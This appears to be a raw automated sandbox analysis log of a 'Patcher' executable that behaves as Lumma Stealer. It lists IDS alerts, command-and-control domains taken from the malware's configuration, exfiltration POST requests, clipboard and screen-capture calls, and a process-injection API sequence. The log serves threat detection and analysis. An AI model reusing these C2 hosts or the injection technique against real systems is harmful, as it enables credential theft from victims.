                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push eax2_2_72C80C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_72C475C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_72C475C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_72C6EDD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_72C705A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09h]2_2_72C5C5A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_72C625B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_72C625B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi+10h], ecx2_2_72C6FD42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi], edx2_2_72C6FD42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+218BAD1Eh]2_2_72C59567
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_72C6ED78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+1Ch]2_2_72C70504
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_72C6ED2F

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058638 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click) : 192.168.2.4:59194 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49731 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49737 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49736 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49734 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49732 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49735 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49730 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49733 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 172.67.132.7:443
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: cureprouderio.click
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.132.7:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B19UGHS7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18110Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EPPY8583NRMLK1Y9P1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JFRI0XTWAP9VNETUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20426Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7KD821I4EZLFXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1244Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CHY259J8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569954Host: cureprouderio.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: cureprouderio.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1712211589.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770621698.00000000053BD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1713958130.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/
                Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/$&%W&
                Source: aspnet_regiis.exe, 00000002.00000002.1770111652.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1698975057.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1712211589.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/api
                Source: aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/api(
                Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/api9
                Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/bu
                Source: aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/gg
                Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1713958130.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/jh
                Source: aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/pi
                Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688210656.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688005128.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688081939.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673362478.0000000005409000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: aspnet_regiis.exe, 00000002.00000003.1673362478.00000000053E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688210656.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688005128.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688081939.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673362478.0000000005409000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: aspnet_regiis.exe, 00000002.00000003.1673362478.00000000053E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C76F60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_72C76F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C76F60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_72C76F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C77363 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_72C77363

                System Summary

                barindex
                Source: Patcher_I5cxa9AN.exe, -----------------------------------------.csLarge array initialization: _206D_200F_206B_202E_202B_200F_202E_206D_206D_206C_206A_206B_200B_206F_206F_200F_200E_206C_200C_202E_206D_202A_206C_202E_200B_200F_206E_200F_206F_200B_202A_202D_206D_206A_200D_206C_206D_202D_206F_200C_202E: array initializer size 431616
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory allocated: 72C40000 page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE3170 GetModuleHandleW,NtQueryInformationProcess,0_2_6CDE3170
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE3780 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,NtGetContextThread,NtWriteVirtualMemory,NtReadVirtualMemory,NtSetContextThread,NtResumeThread,0_2_6CDE3780
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE11F00_2_6CDE11F0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE31700_2_6CDE3170
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE37800_2_6CDE3780
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE35900_2_6CDE3590
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDF25750_2_6CDF2575
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE27C00_2_6CDE27C0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE3CCF00_2_6CE3CCF0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE1B4C00_2_6CE1B4C0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE01C500_2_6CE01C50
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE024500_2_6CE02450
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE38C300_2_6CE38C30
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE3C5F00_2_6CE3C5F0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE155FE0_2_6CE155FE
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE0FDD80_2_6CE0FDD8
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE06D720_2_6CE06D72
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDFCD300_2_6CDFCD30
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE12EC00_2_6CE12EC0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE19EC00_2_6CE19EC0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDFD6E00_2_6CDFD6E0
